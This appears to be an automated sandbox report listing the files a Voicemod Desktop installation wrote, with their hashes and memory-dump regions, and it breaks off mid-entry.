SHA512 5c351025379106f857c6a67defea313ab625a419c6bf10ddc6d6e9155826e990181b2e400ced40a6182893cae706a999f3b7516549ebd17b50f0f2070efc4408

C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe

MD5 0b565f10d13fe55c05ff80149387a50b
SHA1 747540e8001fa6f5b3a44af2a87d5c30b4183016
SHA256 7cf24eba2bd67ea6229b7dd131e06f4e92ebefc06e36fe401cdd227d7ed78264
SHA512 cbcb8ebd45aea4e73f283bd6d3ba8367b118b786e12cb5298809288e3640fae84b0ccf0c23d80bb557385b7206d8ef3452b4ca7e82215a14e7169418d5690b5a

C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe

MD5 420a42886217db61f442287c83c5a31b
SHA1 b23b670645f17a39d424bc10416f652649273c05
SHA256 8c13a649c567be84e4e3a262689f6b59dcde3e9f8b0037869710fc693b2bc0ff
SHA512 c4c3c8f0e35afad415ce13b3cebc68749befed9e1d9ebef04a595f3c51a6ef59b9aea4dcc205b1743e9f04a2258c1911979871058220b926c9fbb0acc42d22ab

C:\Windows\Temp\{64C2A411-425C-44DE-AE4F-7AB61BFBE62B}\.ba\1055\license.rtf

MD5 f1a281f74d3e91d16dd26d1f313cd8a9
SHA1 ddb2ca9032c5a9c091eac53b679f6ba428077b00
SHA256 f79108a254f876e0f6bbcb05a9effbe25dc252e7ea256bfe3fd28ceb79737f25
SHA512 484c5ca26275427e1fb74d3217a22a0e4aac409aba973e78d7ad68834e7ad1d86c7855d34b227925200f941d288dfc09477b2d7dfe0856810c6c847297b8d625

C:\Windows\Temp\{64C2A411-425C-44DE-AE4F-7AB61BFBE62B}\.ba\wixstdba.dll

MD5 f68f43f809840328f4e993a54b0d5e62
SHA1 01da48ce6c81df4835b4c2eca7e1d447be893d39
SHA256 e921f69b9fb4b5ad4691809d06896c5f1d655ab75e0ce94a372319c243c56d4e
SHA512 a7a799ecf1784fb5e8cd7191bf78b510ff5b07db07363388d7b32ed21f4fddc09e34d1160113395f728c0f4e57d13768a0350dbdb207d9224337d2153dc791e1

C:\Windows\Temp\{64C2A411-425C-44DE-AE4F-7AB61BFBE62B}\.ba\logo.png

MD5 d6bd210f227442b3362493d046cea233
SHA1 ff286ac8370fc655aea0ef35e9cf0bfcb6d698de
SHA256 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef
SHA512 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b

C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe

MD5 f028144fa94ab6c59187e0eb235f01ca
SHA1 d6e1f8c8fff153a59a11fab9777ddab60d9d023c
SHA256 251640e8039d34290133b2c6e3e6fe098e61e2756d5a4c45fdcec9e4dee6c187
SHA512 a65506f77f1d497eb26ca3da8565977f46f715b7e1d18e2b5a36978d7989c07e2be8c9f6a2a34feca3808ed51e329f375ca2746d836e50191e7e6d144aa0f819

C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe

MD5 3d9d11e54c2b798c3fb51397560a28f5
SHA1 50d1ec1e655533491562162ea1b9735439297191
SHA256 8440d4640ee1eee29b31a85c1c05f6106b907a2967a2902570d53996230f9571
SHA512 175ec09520461fbb85e4d1829ca1123dbef7939807a6a837b1f04b445a52fb908b1c30ea07f6f0393486bb23a53bca5b18261c92d01e90dfe9c7f7a91d93a0b2

C:\Windows\Temp\{ED9613BF-0FF6-4CD7-8E4C-D419CBBCED97}\.ba\1036\license.rtf

MD5 1da77b492870266e67626ce000528425
SHA1 bbde5f2e5c744bf7eb4931ad0be883bd8a89cee2
SHA256 84cfc67f98d7553ab6af43e9b8d89138a9f46d0fd9291a441d7fe73f5c1a9dc6
SHA512 1efbf899fd722d5ebe2b885deb37da601c4291000761ba1825b4a76c2b51d5b69e1e03106ef0e29a108cc6b8ba8ec69ee7c7af641fabdcb1154a35d3dcb263b1

memory/5116-276-0x0000000000400000-0x00000000004C6000-memory.dmp

C:\Program Files\Voicemod Desktop\driver\SaveDefaultDevices.exe

MD5 ce0e059d4365c22f6f8cc1ce04ff5418
SHA1 09eff27e69a3e4d3cc8bef9e93fe6ae7e20447c8
SHA256 663e5b184648639cbcf353ddaeec6688abe323dbccf8de8fc8d2683f5e1a99cb
SHA512 c8c9ff1fcb172bdbf90d598b2cf0c5f0dab31132b8633540a162ec0c299861d64f36bb805da7dca5b4a4ac96c74fc420303235cbc780f09a2c2aad5b7de724ff

C:\Program Files\Voicemod Desktop\driver\setupDrv.bat

MD5 8a8790395e17b81e5638c805d25f1aad
SHA1 da8fa73c457715c8a9c52e93f640bc34983f6a14
SHA256 8d0ee2177712918bde4be1fdba8d87815863d864a993a3361459ce194131f6a3
SHA512 9eb26cd0bc8e0d41ba4acb34eb4e809317dc5f7e1a0f7e6671dd64f6deb7720ffbfaff76b94e24162ddd992582793bb8f94227cd7b59fccb0234d753862fec75

C:\Program Files\Voicemod Desktop\driver\uninstalldriver.bat

MD5 90df9e95ac9ce0911012063619c7f6db
SHA1 4d942854cfd3b5e21327a0c8a7366c570ef63a4e
SHA256 883f7763a00f6419f7acc21a1772077e16b432dd1b6d15ba092a3a3a19667bc3
SHA512 6513d48c996f845bf1635552fbda26c68c57a0cfb7dde0e92181378b9724cd69d80b5d0f2e5fea2c9dcca03f668e4da81fbbffbb2c356f301bbee6baddb525bc

C:\Program Files\Voicemod Desktop\driver\devcon.exe

MD5 8d54022fb70fd952257ca4ea17efabc6
SHA1 8f0af9538ae263ead5d310b8cf393f46b0e4689e
SHA256 4bee65c38784c64888c12dc35fc706051dcdb32b4949766e83ad260096601812
SHA512 38a020b700b463331918c055bba8cd1e4281231954d854ad9b10d1da746f495afed5b110401266edfeb31416d2b0308209da1391ac0d1401da25546b380df38f

C:\Program Files\Voicemod Desktop\driver\vmdrv.inf

MD5 69ffb954ea5d86423e3119b1243245aa
SHA1 21b7dfed35ae606d6dd3a4084a9d2f23d5e0c0fe
SHA256 fdc1514450a4eac615d959e17e527c6d69cfe92871626b39bc38a096a439a45d
SHA512 bc6130d3e989109f246af6c5db4e1a08c6363dacbce25d7dc164c8d4a1f89682b6afb761ef1199d17eb35198b9dc60e6bbbe5c91e37739d42565a8039e5ca410

\??\c:\program files\voicemod desktop\driver\vmdrv.cat

MD5 2a806a9b70eeba9507bba3f6f44aab0b
SHA1 9577336a7c441c6df360a598e89eef7a3c765ff2
SHA256 488b32ba019c0db448d0669f70bdf564d0f4bd23c7f9592d185474b0d62c763a
SHA512 197a4bd6427c8be1d5a1eca2faa98b1cfcddc7bb53210ddb20e5916b55fe5c4064639932042855db6dac371bea30ca13d9403cd4d8679ea093930694cd37980e

C:\Users\Admin\AppData\Local\Temp\{d6d9d755-21a1-004a-9992-bca29bcb94f0}\vmdrv.sys

MD5 31acfc46ce310b4fa7750c3db047154e
SHA1 d99d6f7d2bad8dcac0516170f9b1c29946eef4f3
SHA256 1f6cbdc32658ffcf48f6a037302f96c515febe16b459eeddd9c5624d5be91182
SHA512 9f1edb81bd70d216afe265ccf8b0ebe3a62f2bb31204339402e250b7e844ae9ed7aba84754d21ddf2f5854e406cb36fac346501d321113c784d54dffb170807a

C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe.config

MD5 4bff4b706028b0c1a4493478a41b6075
SHA1 0ebaa8b02aafee8a45b282c09bc59525e81eb2ee
SHA256 71245f7de6f8cd1855194be81c191f8435fbe62b780f40fadfbce1efabb21f44
SHA512 10c1b88fea7298610a9a8a78b83319fc8b3299513879031f63292de7c90520ecf3c2009ab8eb00a9f0ee262a4f433d272150db42a7e94fb20bb63b66e06c8f49

memory/2540-415-0x0000025CFF0F0000-0x0000025CFF3C2000-memory.dmp

C:\Program Files\Voicemod Desktop\lib\VoicemodShockets.dll

MD5 80e49cafaed9e42fed7380ef96f22922
SHA1 f6cb4095d3fbeb4f06f829ab13fe979c64728c7c
SHA256 3c560d555221dc58b10de2edbedab07541b9673e686279c883ee955646096f2c
SHA512 16f02c89b425aa8412d92945ddd1a8a87b78ffabb033a125ee9df5a51430fa2806579c710c7f9832a172a20919dffd33e98eecca512a98b3271053567a17d09c

C:\Program Files\Voicemod Desktop\lib\Newtonsoft.Json.dll

MD5 f33cbe589b769956284868104686cc2d
SHA1 2fb0be100de03680fc4309c9fa5a29e69397a980
SHA256 973fd70ce48e5ac433a101b42871680c51e2feba2aeec3d400dea4115af3a278
SHA512 ffd65f6487bc71c967abcf90a666080c67b8db010d5282d2060c9d87a9828519a14f5d3a6fe76d81e1d3251c2104a2e9e6186af0effd5f331b1342682811ebf4

memory/2540-419-0x0000025CFF7F0000-0x0000025CFF896000-memory.dmp

memory/2540-417-0x0000025CFF570000-0x0000025CFF57A000-memory.dmp

memory/2540-421-0x0000025CFF710000-0x0000025CFF71A000-memory.dmp

C:\Program Files\Voicemod Desktop\lib\VoicemodLogger.dll

MD5 67f3a5fd99bc104a01a906df6f5896e3
SHA1 39527769e186278029a6d4303cb3015ac90d5c01
SHA256 8f2c68dd604321d09343b5566b74d72527e78ad717fc41e91d48ce931a8eedb0
SHA512 e46dc143ca5a73ba2215bf7cc5e9c530ea163db55418291bf2f2a8f83ec2084b025e0269f398d92c14f8fc5b182e08ab2868f288c559454c8ab5c517cf393995

memory/5116-425-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/4340-426-0x0000000000400000-0x000000000041C000-memory.dmp

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\user.config

MD5 9fdcac422aba9a832c4e1ba63c4f5633
SHA1 9d702a9454da3907bdd2cdee1cc7a792b25c2c6e
SHA256 733e489330d34542d6f8eca88b68115b6611f7cc4c44abe8433fe190784fce2d
SHA512 d759f45448cf0e9beac03e1c3a967a2d1d80d4155aa78128c33afa62c47f616399cf3c14f087707220e17d63153d17ebc8b9a66fff64f9cadadd9771ffbba56c

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\user.config

MD5 850b92922b6a569b4da027c1caf7a7cd
SHA1 852e09d5b0ccd4e11e0d8b2c1c084eae560aca07
SHA256 1551dd11ef2a6dd31557ece197d2db5d1a54ba79a71436824f3d6c0a976eda33
SHA512 d23614ac73fd233760cc26ec81418ba77175c56ac20d1cc933da06f79cc367e80a1a2e617c6eef3e120180956bacc749657d4624f9629116c19a5bc9948bb449

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\nu5lgecb.newcfg

MD5 4c38c4d2f2d825653c0d94f18dee479d
SHA1 c8076b64a41526abe718f4d23352e265abc1a9fd
SHA256 ba18f2cd22a815d0944ef5c912dfddf24cd5ae025a4e64928d658a6711f31129
SHA512 7a99d8545254a6fbdd44e82e11da7ba95f5038d42663bfe37f57d69b00cd7b659828846ba8cae7f60a2951e276e28ac0cafad1234c027e02a553772d07c2cae1

memory/2540-461-0x0000025CFF740000-0x0000025CFF752000-memory.dmp

C:\Program Files\Voicemod Desktop\lib\VoicemodControls.dll

MD5 68cb781b645a287646e211ff3133fbe4
SHA1 20f79d9aff52da78a2cd946a1c4c6f5b2cd062d3
SHA256 f99f25bdfa5ea1a40fc219738ea3e56657a2119bd9d07c3961a168a72ab37f9e
SHA512 69b3e636f53e684fb2d1a1a183a8d3131c33d357269f4a009f8f0690c9662dee62b63be1bb79c0aecdc16f3320e616700971a1af5749a1d3af5dde6bf1335269

C:\Program Files\Voicemod Desktop\lib\Hardcodet.Wpf.TaskbarNotification.dll

MD5 366cd5572e467b3b06515cfb4ab036ad
SHA1 156f75191d06905003a7ab811880556af8dad44a
SHA256 f84935be717e1c49a54c1d7f8476243a4d34c0ea90c4ad13afe3f50164ba5f2e
SHA512 96c4d4c8c05478dc124cbaaa3d36b304697edb1d0e7ae197c786f04e76df516cbf093d4aeae8cfeb9182f22c3758e93e242d43e8510935be473c1c0637a03e21

memory/2540-463-0x0000025CFF720000-0x0000025CFF72C000-memory.dmp

C:\Program Files\Voicemod Desktop\lib\VoicemodSDKDotNET.dll

MD5 a88987bb53e80e790611ead096add25b
SHA1 e4c7965384d4c467f228dcd83eb16754c47377cf
SHA256 0286fcd7d25ae394323ce46b23d800f966e4da4d8441d51d6d74f3943cd69b0f
SHA512 d21069e03636036b8484ec9e37cf5d56468b80b281923ca79607d56cfe7f2befaf1981850702958e07a28d95029bd2f42a1d5bb09c83e5da541dec58ec9c752c

memory/2540-467-0x0000025C9BE60000-0x0000025C9D4C4000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_51A881270F6155CF26F60F8639C44CB6

MD5 6c7fa8ff380ee4af50f9c368c2be860c
SHA1 6529814f468ce2e99c83988940c46493528293a6
SHA256 6f694a5d9a0d98f0d82b088579dbd0538129c8f17421dd91016e35f7122d68fc
SHA512 8732e18c908150146dfb79220becf4cdaa1ef52c2fd87f7e68da930dba96d0d5e69e94d98126fbe2290bbc220c6898975cb4e8d54caeb590896802e54afbfccc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_51A881270F6155CF26F60F8639C44CB6

MD5 cf02f958e2229b76a9564d08fab60b56
SHA1 f427bede77d0a3ae90caadb61e2858b29c64f873
SHA256 6fa95b73a0598b49c11d220fd8528860b5871ee08bfe5b109cc376ca531bf009
SHA512 ce73cc169c20a16f698bf5e2263450caed5adf9e2a0a9fd508fefa33a6afcb3f1549586337ed3851991a1cb2ac3202079cb1e4256c0c522485e49c672674bfec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D

MD5 ed42c18ebb810104dbaa32aa6dbe2699
SHA1 dbcf8a5be41ee95b92c60fbd21150d466752d290
SHA256 7aa195d21d995703f7e2751e4d2843e7d7132e81ccc0a18b87e6c4ae8d2b23fe
SHA512 1f1d1220f71556aa997304e4abac5ed6b49bcf2ffe68e1e0c804dcab56ed328df3c6d19315c09f427d167d73bf0e150a3714baf820f6086696efe51ef4ef5bf6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D

MD5 96c389b11886402799c9144556714bff
SHA1 afb87ecf7edcde707cc81f7739139109eca30c49
SHA256 7e60b4c399c0392803474926bcf8ff45fd59354e4d71d4c3b147ff0ed56e3c1e
SHA512 857f80998e5f222a70e0e575a9b2a311c80e87662dafe47e891a307bd2a045c6a1d23db231c92df941ab5336fa5978d5531305239de0415dadb3d0c0a2a828c4

memory/2540-474-0x0000025CFF730000-0x0000025CFF738000-memory.dmp

memory/2540-475-0x0000025CFF7A0000-0x0000025CFF7D8000-memory.dmp

memory/2540-476-0x0000025CFF760000-0x0000025CFF76E000-memory.dmp

memory/2540-477-0x0000025CFF8E0000-0x0000025CFF920000-memory.dmp

memory/2540-481-0x0000025C9F660000-0x0000025C9F66A000-memory.dmp

C:\Program Files\Voicemod Desktop\lib\RawInputProcessor.dll

MD5 33f6ad87b6d8128b831be2884cb4ab2e
SHA1 e4277426445197a7ae4463b7732ccb282fcecf42
SHA256 ee069a485d30cebc1c56f25d2c1b418c13bf685065f1a3c2976bbec42f5b53b9
SHA512 f7104bc09bc4ce4f773fc2637a0952adef836715a6298545a7124364aaa94124e2cea699672113805911b942758128255394361baa42997f02769b7df454c2e1

C:\Program Files\Voicemod Desktop\lib\SimpleConverter.dll

MD5 f39f4d5a10201198b0789e10a915baa6
SHA1 f81e7ffe073217a48adf0d794261aa69ee943ec4
SHA256 f6d536162aed7f088b7d7d4bd18f33373f912cf6c3c2699cd7703ea2eef05cbe
SHA512 c337808b1f8436453f9b46057eb66b206e54d4810a11be11d125b1b92c31ab16d1faa4221d58c5e3813ecc3d7afe28d00a5fb9118d89b9d32558608d4e71d56c

memory/2540-485-0x0000025C9FCA0000-0x0000025C9FCA8000-memory.dmp

memory/2540-487-0x0000025CFF8A0000-0x0000025CFF8B2000-memory.dmp

C:\Program Files\Voicemod Desktop\lib\Fleck.dll

MD5 6d146f7df192621476283af335fd4180
SHA1 23856ece8d35a46fab20d999baec69b995819ff4
SHA256 65ae6fc064fe4e079fd7a462b79694b22275307723e0127dfe5c33132d30f902
SHA512 7d414ce663f2f1ac115335ab2f9454f6001fa175c71d49c6d09e0c3f3f1003809e56f7fba88a8d04b9e34a8032c3e4d2e467b30d12f7483ec60fee350a2fcef1

memory/2540-488-0x0000025CFF920000-0x0000025CFF942000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\VoicemodSDKDotNET.Amd64.1.3.0.7\VoicemodSDK.dll

MD5 6b0543fb8961eeb922ca06caae8352f3
SHA1 8b266885db9a88f2f89078eee5d2b2bd0f5a0918
SHA256 e3dea719f31d200f4e9719d5a8e7e34ff385652bec82c2ee7fbbc48ac888fa1b
SHA512 9cb787d924d61cee4708941d52345e68998aaf230403bef0a1c73e5755f11a6fa19be917d9038617f485d3bc8ef46b90fab0bf3a0e1bb2f292dedba9c6463087

C:\ProgramData\Voicemod\VoiceData\sdk-walkie-terror-1.dat

MD5 0ac77f83d2d00526db401718f13519c2
SHA1 6e1755c5ff69ca23ffd2af543b65fc299bc6a3ca
SHA256 254cca4fe05e8cb0b4d8ddd977258f1e780bb12f6d473e407e8445d1022649a8
SHA512 9336d5dd34e35b5199cc1fbe5cd98ad2d2f2d6fb9926907e8a78121fb58e9c17b320630e0f673bb70b2d1487b84654176ffb12cccb3cf1e7fa5317ce3d1ec64b

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\ik1v252h.newcfg

MD5 44e0a901780a5bc1d3b59fd359755b49
SHA1 6cf0d74cec57474b9023ccd0e9f290f49ceb08fc
SHA256 caa07c4a8c395559e7596d9c68fb78f7842949728383f119a18951c8e0555e85
SHA512 69de83e29a2499bbac50590eb008155c9806f7e8b7a38ed56a443c93cc4a8a89d4b74f09ded28392e88acc2fef6fd5661628d527126c119ecf6e920bdd2f3dd2

C:\Program Files\Voicemod Desktop\lib\SharpDX.RawInput.dll

MD5 c424d62f5045d6e2800c7fdef5f1697d
SHA1 434e533928d6da0da41201d6e4b0baa97ac93b91
SHA256 727e4f5e311b1f582bc89ae9e2c3cd585b7952c433b6e7656521bac05811f651
SHA512 0e5a564d9de35eb3747350c4ff7e456cd8b544f89641c7bc7df03008c30ff0eae53b3d5c5744fc736fe9aab27d638455ad221499a2b13f2084cfb602f13fc114

C:\Program Files\Voicemod Desktop\lib\SharpDX.dll

MD5 6fabeaa1c8ea15e787f2e3b487ab434d
SHA1 c2091f69192903676ed6b181bbf8346b819c43a2
SHA256 28437b8f6036224b187f6ec324af9cd8f20dc5e363b0341f86869e4172f07909
SHA512 076bccbb7ddd4bb7b785bc70dfcaa920c080af30172ce1dcc49594a96f96133d0322db73362c47d8b4d2afa69e0ee0c78a3b423aa4886478080529f864bf1739

memory/2540-615-0x0000025CFF9A0000-0x0000025CFF9E8000-memory.dmp

memory/2540-613-0x0000025CFF770000-0x0000025CFF77C000-memory.dmp

memory/2540-616-0x0000025CFF780000-0x0000025CFF78A000-memory.dmp

memory/2540-617-0x0000025CFF790000-0x0000025CFF798000-memory.dmp

memory/2540-618-0x0000025CFF8C0000-0x0000025CFF8C8000-memory.dmp

C:\Program Files\Voicemod Desktop\driver\defaultdevices.txt

MD5 0e5eb142f749641ed53bbe3ef1dbe117
SHA1 a6d2fe121719a6b7fb1643ee5943400dc76110bb
SHA256 1858a607f47d5d33bc078209c49257888a1e1d1ffd7efe7c6045c627784de0f3
SHA512 164d12352a1593abcbf373471b36a73fc7674efb6d5673a67380d17da172b8ad0f0e6f307c014d0f0c92e71c344417db089a273086068a89c220440c50bebd49

C:\ProgramData\Voicemod\Temp\sdk-custom-fx01_44100.wav

MD5 2516ae38a1111603415a6e333b774f38
SHA1 5c1803b3e5542a23db25f5fc55afa66ac0cae8dc
SHA256 4312292ed70789b7bbc6363df24ef91f98f19ad47d7458af2468031da23f0a24
SHA512 aa83d86e15fb5eb9ca627f9d35919ad126f2fd0eb107e0de9f1c5bbc9f126405e489549d11b13003ee1ff3c72604f1b7684a8562c4c5efe104d118e938f46d49

C:\ProgramData\Voicemod\VoiceData\sdk-custom-fx01.dat

MD5 9e00c46f54c86ca14352960177e37b7c
SHA1 b41333fb5f8572d989136fdfc95791a7b5d9d563
SHA256 053c5a457729cf059c6bf023fc693246635b147040066e0953f5b5e119e68037
SHA512 1a2afa13b114e64b24d8823ed2df6d6b2a3829c49f90b09145d2ecc7b92423200e1f61c7dd657c567b3045902ee0e6c252f4d7d5567cdae9d637ee9b53ad8375

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\qe0q505b.newcfg

MD5 c1901bd0ce588c6243e6f8adbd5f873f
SHA1 f35a590e5e5cb0dd5e98a701c0cddb8ac0935e30
SHA256 c38d112e15b18e25cdaf1bb09ea05252c2cbeae7c524ee4048cd468c16636e91
SHA512 4638615bff1c1a9c0d1ea8c36ef96661c7d3d1d3605566f7653942b27b103367e598ddfd9bf8a9f3bb8bae972e1d15d0eb9e48affbdefb31939621c9608fd4c8

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\user.config

MD5 cce69b78b5e3774cb43e1060921c49fb
SHA1 69d2b7a02d54809a0a44705d6f6431fb78df292f
SHA256 bcb5db386701ce57821357e2471440a8dadfaddb2a7e017b072f8a79c1925cfd
SHA512 a88c902ff01091717461dddab9189f2eaa14a5b793ffc5432d593c081ccd1d5216dd277d043cd88527d7d3336f1c243b7f591e7ab6ed680081d08e1c28f07bb5

memory/2540-701-0x0000025CFF8D0000-0x0000025CFF8E0000-memory.dmp

C:\Program Files\Voicemod Desktop\lib\GoogleAnalytics.Core.dll

MD5 d67fe5af6345272b8b24e1d4b08732d5
SHA1 863f1b88aa8f8dcfc4e13339951cf12c52a1cbcd
SHA256 8a3871479b26a5da72788eacb4543b32cadc0aacffb82bb7351040d4e4a915ca
SHA512 e670e53a983e3c209a2cf3a9178cfcaba2a125530241f5b86c4d9052598d382c2a69824b2254c269ee716800b43fe3e920020d5cfc1c428f32d79372b0979892

memory/2540-702-0x0000025CFF950000-0x0000025CFF958000-memory.dmp

memory/2540-703-0x0000025CFF960000-0x0000025CFF968000-memory.dmp

memory/2540-704-0x0000025CFF970000-0x0000025CFF978000-memory.dmp

memory/2540-705-0x0000025CFF980000-0x0000025CFF988000-memory.dmp

memory/2540-706-0x0000025CFF990000-0x0000025CFF998000-memory.dmp

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\user.config

MD5 9b8d2d6ecd864302cbeeaf5df4bdbac1
SHA1 a1032075a5a8cbaed24036b793910b2d9291f277
SHA256 a5acc184b57a38f27e93db619b745f2507239e65d9eefcf5a393e64b544bdd57
SHA512 8f30c8091ae1661b2a24c4bcdef4e782e6035162b8cf0f183856fe89ceb3e2e5115f33ad7ebd3e65adec25b7d34997638d82db009ed51b31eda0088edad3f887

C:\Program Files\Voicemod Desktop\lib\AutoUpdater.NET.dll

MD5 352ae2bf69212f6ed9c83a490b7f3092
SHA1 796dae8aa2cbaf23edbeca952004bc5027c48981
SHA256 bf1e263bc97bdfe32d90471253d9771a132e5cc1546502ed7c8e94548f6472a6
SHA512 c01c753f9cc5aee8c0e8506d8331bd7e7be33d9635a94b9d38d4c019f72cce8ca82c4b4899873d58c150cb9c2000a010cf99a1de9f240af60f609d613b276b1b

memory/2540-719-0x0000025CFFA40000-0x0000025CFFA84000-memory.dmp

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\5g2i0h32.newcfg

MD5 57712607b32564b41c554175495e3eea
SHA1 b91e8ce98b361d9cf700da5a2dfe80a7d9e2b784
SHA256 06f8d25369e69372b807699ab9d8516bfc1908e1321402606a83f65fe0c7d740
SHA512 631ebd8a1f982f23a4521555b2f92a0f0a6f4436f9c0bfdfa12da74edef010a0b2b21dc80dfed7e63978c86889455e1d09a5564e9a740a5cffb92d584f83419a

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\40g0ttds.newcfg

MD5 58a3bcb724b64ea59a6d95ecb9569084
SHA1 f05574c0b985c86065a05cc94a56bf2301ba34d1
SHA256 97098f529186e38bd24ef8f18ea3cd01fa8967edc5f3bbda2a522c89579a60df
SHA512 2a288d372ca15e07ac344b46135c0d8f0c70f711925b82502da3d023c83405d4c5937c9bf46cc99ab047376b929ee6c45241bbd45413ebd8525d0f22e9e14fd7

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\dywe1xzu.newcfg

MD5 1befef1025009c7b94cb71570f07b8d2
SHA1 eae4e237b70e2d4b312505d7c278ab41c6a82661
SHA256 d967dcbb53e4e68b59d5a79bcbb9361c43659c300b100ef427dfca257ac2e3a4
SHA512 9fa6f76d8e7c3da96efcea3a2cb79a3bb3da92e3ce0ae4b974bc3268d6176d82489cee23051d28990c1c1f5715229fd2ff645984989995601a58d8ed723318d5

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\user.config

MD5 d583096ca8f2aadd799d90e3aaeca0dc
SHA1 0d8946ee6cf9f46b24397363d2cec6ee69e853eb
SHA256 6517419bf5bdb77cca3f6b80b723e357add1fde97acf412361f0ecaeb430ac35
SHA512 d63c44fd9d73b5f398e13e7bc21cb91fb5af81a4e27730dc3a12db549b63be12a6449b229559798138865d641690c4ff7dc7c1c9248b3afb5f8f98133fa65e79

memory/2540-771-0x0000025CFFB10000-0x0000025CFFB86000-memory.dmp

memory/2540-772-0x0000025CFFA10000-0x0000025CFFA2E000-memory.dmp

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\ztnwiygw.newcfg

MD5 90132032ffced7de31e5a3db11a6deae
SHA1 cbed047b8cffd765a8f2d6ff433e5de31306d0c5
SHA256 85526bff802532e812546afcb5fcd2d4f30f3dcb9d5f2fe75bdb913107f250db
SHA512 d08812b78ca2b62ceeed04e6cf20e2ac186fe54f73b01c10f34f67a437aadaea24f81787032f9438a373ccb9ce76549cbc12d2e8ab7e9018e373b6f9dcc3c1b1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\VoicemodDesktop.exe.log

MD5 67022ef4d501993f13a7c907910d2ea2
SHA1 2ae70f9fae494c52f415d442f4fbbbb01280f016
SHA256 d3042c73e34b33a183064b62348c0ed2931768ec0576bf51f3327f9dba085869
SHA512 a4f254356c5e3bef5e8156cf9dbb2c4dbcfbbfe44e73063948671aaa4955966b59e0bd9157612fad18023ce221be926ad58d289b28469f5b3db02b04e6fe7caa

memory/1328-810-0x000001A22B410000-0x000001A22B6E2000-memory.dmp

C:\Users\Admin\AppData\Local\Voicemod\VoicemodDesktop.exe_Url_5eqzat5j1vvntgkq3ppydjqwsvipp05p\1.2.6.8\user.config

MD5 66e5080f3b3c877a29eaf413acb4f14e
SHA1 d59c360b527a02b170e7b562e6bb8a1c28be8dbc
SHA256 088713cbed1d12418e68501dc19c0064298c2d15c16b083ba67df9f846da661d
SHA512 b4171a5dadf2a52b62bda206fb833162d148f38817d5efde09ba6e1a57a0b4ee7fd8c11a481fb65df941869fc1841928588d5777276e78dee3ab79bee25a1224

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 36988ca14952e1848e81a959880ea217
SHA1 a0482ef725657760502c2d1a5abe0bb37aebaadb
SHA256 d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6
SHA512 d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fab8d8d865e33fe195732aa7dcb91c30
SHA1 2637e832f38acc70af3e511f5eba80fbd7461f2c
SHA256 1b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea
SHA512 39a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 52bee9eff8fbe1eb74788beb0cddc560
SHA1 5bdd0af476a53162f39c022ad72243f7e669d4e5
SHA256 0ad99aab4141bc170b845433a4efd06b21e6b13962ca08cd59686ad1be7feab2
